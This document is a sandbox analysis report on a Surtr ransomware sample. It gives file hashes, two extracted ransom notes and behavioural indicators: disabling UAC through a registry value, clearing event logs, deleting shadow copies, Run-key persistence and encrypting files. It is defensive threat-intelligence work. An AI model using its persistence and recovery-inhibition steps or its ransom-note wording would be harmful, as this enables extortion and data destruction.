surtr | 267fa786176679a2d99bf4d47cbcd8591640452ff393af7d61cfd5c0d8e67f33

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-en-20211208
submitted
21-01-2022 03:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Surtr.exe
Size

383KB
MD5

709fedc6247f6c7a93dd570e15010dbe
SHA1

a3b061339364f053f521c894b0d5f08516fee493
SHA256

267fa786176679a2d99bf4d47cbcd8591640452ff393af7d61cfd5c0d8e67f33
SHA512

b6379dc973322b4e46fb79c5b88de30a763fe373cb5381e9d64b6ea56e33a6bb95529e970a53770337a3373efe48a766b9663421e901225da2fe6d1e245d118c

Score

10^/10

surtr evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address [email protected] use this ID( VdfyMMNFVER12f ) for the title of your email. if you weren't able to contact us within 24 hours please email : [email protected] Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

[email protected]

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (VdfyMMNFVER12f) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Detects Surtr Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1896-59-0x0000000140000000-0x0000000140161000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
1056	wevtutil.exe
208	wevtutil.exe
1604
680
844	wevtutil.exe
864
1504	wevtutil.exe
216	wevtutil.exe
1724	wevtutil.exe
1500	wevtutil.exe
1464	wevtutil.exe
1012	wevtutil.exe
1340	wevtutil.exe
1876
1780	wevtutil.exe
1088	wevtutil.exe
2016	wevtutil.exe
856	wevtutil.exe
1120	wevtutil.exe
1552	wevtutil.exe
792
660	wevtutil.exe
1768	wevtutil.exe
2020	wevtutil.exe
1092	wevtutil.exe
1764	wevtutil.exe
216	wevtutil.exe
1580	wevtutil.exe
1992	wevtutil.exe
1588	wevtutil.exe
228	wevtutil.exe
224	wevtutil.exe
1604
232	wevtutil.exe
1992	wevtutil.exe
1476	wevtutil.exe
660
1464	wevtutil.exe
156	wevtutil.exe
228	wevtutil.exe
952	wevtutil.exe
612	wevtutil.exe
1340	wevtutil.exe
1120	wevtutil.exe
1340	wevtutil.exe
952	wevtutil.exe
224	wevtutil.exe
1392	wevtutil.exe
1164
1644	wevtutil.exe
1272	wevtutil.exe
1552	wevtutil.exe
156	wevtutil.exe
660	wevtutil.exe
1012	wevtutil.exe
1716
1500
1544	wevtutil.exe
1612	wevtutil.exe
1392	wevtutil.exe
216	wevtutil.exe
1628
1580	wevtutil.exe
1220	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1920 bcdedit.exe
1152 bcdedit.exe
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
1920	bcdedit.exe
1152	bcdedit.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1896-54-0x0000000140000000-0x0000000140161000-memory.dmp	upx
behavioral1/memory/1896-56-0x0000000140000000-0x0000000140161000-memory.dmp	upx
behavioral1/memory/1896-57-0x0000000140000000-0x0000000140161000-memory.dmp	upx
behavioral1/memory/1896-59-0x0000000140000000-0x0000000140161000-memory.dmp	upx
behavioral1/memory/1896-58-0x0000000140000000-0x0000000140161000-memory.dmp	upx

Drops startup file 7 IoCs

Processes:

cmd.execmd.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Surtr.exe

description	ioc	process
File opened (read-only)	\??\M:	Surtr.exe
File opened (read-only)	\??\P:	Surtr.exe
File opened (read-only)	\??\E:	Surtr.exe
File opened (read-only)	\??\F:	Surtr.exe
File opened (read-only)	\??\H:	Surtr.exe
File opened (read-only)	\??\I:	Surtr.exe
File opened (read-only)	\??\K:	Surtr.exe
File opened (read-only)	\??\L:	Surtr.exe
File opened (read-only)	\??\U:	Surtr.exe
File opened (read-only)	\??\Y:	Surtr.exe
File opened (read-only)	\??\N:	Surtr.exe
File opened (read-only)	\??\O:	Surtr.exe
File opened (read-only)	\??\Q:	Surtr.exe
File opened (read-only)	\??\V:	Surtr.exe
File opened (read-only)	\??\Z:	Surtr.exe
File opened (read-only)	\??\B:	Surtr.exe
File opened (read-only)	\??\R:	Surtr.exe
File opened (read-only)	\??\S:	Surtr.exe
File opened (read-only)	\??\W:	Surtr.exe
File opened (read-only)	\??\X:	Surtr.exe
File opened (read-only)	\??\G:	Surtr.exe
File opened (read-only)	\??\J:	Surtr.exe
File opened (read-only)	\??\T:	Surtr.exe
File opened (read-only)	\??\A:	Surtr.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2 ip-api.com

flow	ioc
2	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

Surtr.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	Surtr.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Surtr.exe

description pid process target process

PID 1260 set thread context of 1896 1260 Surtr.exe Surtr.exe

description	pid	process	target process
PID 1260 set thread context of 1896	1260	Surtr.exe	Surtr.exe

Drops file in Program Files directory 64 IoCs

Processes:

Surtr.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00306_.WMF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\System.Speech.dll.[[email protected]].SURT	Surtr.exe
File created	C:\Program Files\DVD Maker\Private_DATA.surt	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Shades of Blue.htm.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00132_.WMF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\89.0.4389.114.manifest.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\PhotoBase.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\AUDIOSEARCHLTS.DLL.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue.css.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS.XML.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\wab32.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14985_.GIF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\de-DE\WMPDMCCore.dll.mui.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libdirectory_demux_plugin.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0213449.WMF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02077_.GIF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\msdatt.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\ja.pak.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\settings.js.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\PREVIEW.GIF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_LightSpirit.gif.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105410.WMF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBAD.XML.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN105.XML.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01148_.WMF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\OTKLOADR.DLL.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\rtscom.dll.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPREARM.EXE.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10289_.GIF.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.DPV.[[email protected]].SURT	Surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\calendar.html.[[email protected]].SURT	Surtr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

956
1768 schtasks.exe
1048 schtasks.exe
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid process

768 vssadmin.exe
1076 vssadmin.exe
856 vssadmin.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main

pid	process
956
1768	schtasks.exe
1048	schtasks.exe

pid	process
768	vssadmin.exe
1076	vssadmin.exe
856	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main

Modifies registry class 5 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

pid process

388
Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

pid process

1568
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

Surtr.exe

pid process

1896 Surtr.exe
1896 Surtr.exe
1896 Surtr.exe
1896 Surtr.exe

pid	process
388

pid	process
1568

pid	process
1896	Surtr.exe
1896	Surtr.exe
1896	Surtr.exe
1896	Surtr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeBackupPrivilege	1548	vssvc.exe
Token: SeRestorePrivilege	1548	vssvc.exe
Token: SeAuditPrivilege	1548	vssvc.exe
Token: SeSecurityPrivilege	1076	wevtutil.exe
Token: SeBackupPrivilege	1076	wevtutil.exe
Token: SeSecurityPrivilege	968	wevtutil.exe
Token: SeBackupPrivilege	968	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	620	wevtutil.exe
Token: SeBackupPrivilege	620	wevtutil.exe
Token: SeSecurityPrivilege	336	wevtutil.exe
Token: SeBackupPrivilege	336	wevtutil.exe
Token: SeSecurityPrivilege	1204	wevtutil.exe
Token: SeBackupPrivilege	1204	wevtutil.exe
Token: SeSecurityPrivilege	892	wevtutil.exe
Token: SeBackupPrivilege	892	wevtutil.exe
Token: SeSecurityPrivilege	1220	wevtutil.exe
Token: SeBackupPrivilege	1220	wevtutil.exe
Token: SeSecurityPrivilege	236	wevtutil.exe
Token: SeBackupPrivilege	236	wevtutil.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1116	wevtutil.exe
Token: SeBackupPrivilege	1116	wevtutil.exe
Token: SeSecurityPrivilege	204	wevtutil.exe
Token: SeBackupPrivilege	204	wevtutil.exe
Token: SeSecurityPrivilege	1688	wevtutil.exe
Token: SeBackupPrivilege	1688	wevtutil.exe
Token: SeSecurityPrivilege	1692	wevtutil.exe
Token: SeBackupPrivilege	1692	wevtutil.exe
Token: SeSecurityPrivilege	2032	wevtutil.exe
Token: SeBackupPrivilege	2032	wevtutil.exe
Token: SeSecurityPrivilege	1060	wevtutil.exe
Token: SeBackupPrivilege	1060	wevtutil.exe
Token: SeSecurityPrivilege	912	wevtutil.exe
Token: SeBackupPrivilege	912	wevtutil.exe
Token: SeSecurityPrivilege	2024	wevtutil.exe
Token: SeBackupPrivilege	2024	wevtutil.exe
Token: SeSecurityPrivilege	1764	wevtutil.exe
Token: SeBackupPrivilege	1764	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	1928	wevtutil.exe
Token: SeBackupPrivilege	1928	wevtutil.exe
Token: SeSecurityPrivilege	1296	wevtutil.exe
Token: SeBackupPrivilege	1296	wevtutil.exe
Token: SeSecurityPrivilege	844	wevtutil.exe
Token: SeBackupPrivilege	844	wevtutil.exe
Token: SeSecurityPrivilege	1340	wevtutil.exe
Token: SeBackupPrivilege	1340	wevtutil.exe
Token: SeSecurityPrivilege	1504	wevtutil.exe
Token: SeBackupPrivilege	1504	wevtutil.exe
Token: SeSecurityPrivilege	864	wevtutil.exe
Token: SeBackupPrivilege	864	wevtutil.exe
Token: SeSecurityPrivilege	992	wevtutil.exe
Token: SeBackupPrivilege	992	wevtutil.exe
Token: SeSecurityPrivilege	1556	wevtutil.exe
Token: SeBackupPrivilege	1556	wevtutil.exe
Token: SeSecurityPrivilege	1544	wevtutil.exe
Token: SeBackupPrivilege	1544	wevtutil.exe
Token: SeSecurityPrivilege	1848	wevtutil.exe
Token: SeBackupPrivilege	1848	wevtutil.exe
Token: SeSecurityPrivilege	232	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Surtr.exeSurtr.execmd.execmd.exenet.execmd.exenet.execmd.execmd.execmd.exenet.execmd.exe

description	pid	process	target process
PID 1260 wrote to memory of 1896	1260	Surtr.exe	Surtr.exe
PID 1260 wrote to memory of 1896	1260	Surtr.exe	Surtr.exe
PID 1260 wrote to memory of 1896	1260	Surtr.exe	Surtr.exe
PID 1260 wrote to memory of 1896	1260	Surtr.exe	Surtr.exe
PID 1260 wrote to memory of 1896	1260	Surtr.exe	Surtr.exe
PID 1260 wrote to memory of 1896	1260	Surtr.exe	Surtr.exe
PID 1260 wrote to memory of 1896	1260	Surtr.exe	Surtr.exe
PID 1896 wrote to memory of 764	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 764	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 764	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1152	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1152	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1152	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 576	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 576	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 576	1896	Surtr.exe	cmd.exe
PID 576 wrote to memory of 1476	576	cmd.exe	chcp.com
PID 576 wrote to memory of 1476	576	cmd.exe	chcp.com
PID 576 wrote to memory of 1476	576	cmd.exe	chcp.com
PID 1896 wrote to memory of 1656	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1656	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1656	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1832	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1832	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1832	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1352	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1352	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 1352	1896	Surtr.exe	cmd.exe
PID 1656 wrote to memory of 336	1656	cmd.exe	net.exe
PID 1656 wrote to memory of 336	1656	cmd.exe	net.exe
PID 1656 wrote to memory of 336	1656	cmd.exe	net.exe
PID 336 wrote to memory of 636	336	net.exe	net1.exe
PID 336 wrote to memory of 636	336	net.exe	net1.exe
PID 336 wrote to memory of 636	336	net.exe	net1.exe
PID 1896 wrote to memory of 240	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 240	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 240	1896	Surtr.exe	cmd.exe
PID 240 wrote to memory of 1704	240	cmd.exe	net.exe
PID 240 wrote to memory of 1704	240	cmd.exe	net.exe
PID 240 wrote to memory of 1704	240	cmd.exe	net.exe
PID 1704 wrote to memory of 1012	1704	net.exe	net1.exe
PID 1704 wrote to memory of 1012	1704	net.exe	net1.exe
PID 1704 wrote to memory of 1012	1704	net.exe	net1.exe
PID 1896 wrote to memory of 792	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 792	1896	Surtr.exe	cmd.exe
PID 1896 wrote to memory of 792	1896	Surtr.exe	cmd.exe
PID 792 wrote to memory of 1812	792	cmd.exe	net.exe
PID 792 wrote to memory of 1812	792	cmd.exe	net.exe
PID 792 wrote to memory of 1812	792	cmd.exe	net.exe
PID 1352 wrote to memory of 1076	1352	cmd.exe	vssadmin.exe
PID 1352 wrote to memory of 1076	1352	cmd.exe	vssadmin.exe
PID 1352 wrote to memory of 1076	1352	cmd.exe	vssadmin.exe
PID 1832 wrote to memory of 768	1832	cmd.exe	vssadmin.exe
PID 1832 wrote to memory of 768	1832	cmd.exe	vssadmin.exe
PID 1832 wrote to memory of 768	1832	cmd.exe	vssadmin.exe
PID 1812 wrote to memory of 396	1812	net.exe	net1.exe
PID 1812 wrote to memory of 396	1812	net.exe	net1.exe
PID 1812 wrote to memory of 396	1812	net.exe	net1.exe
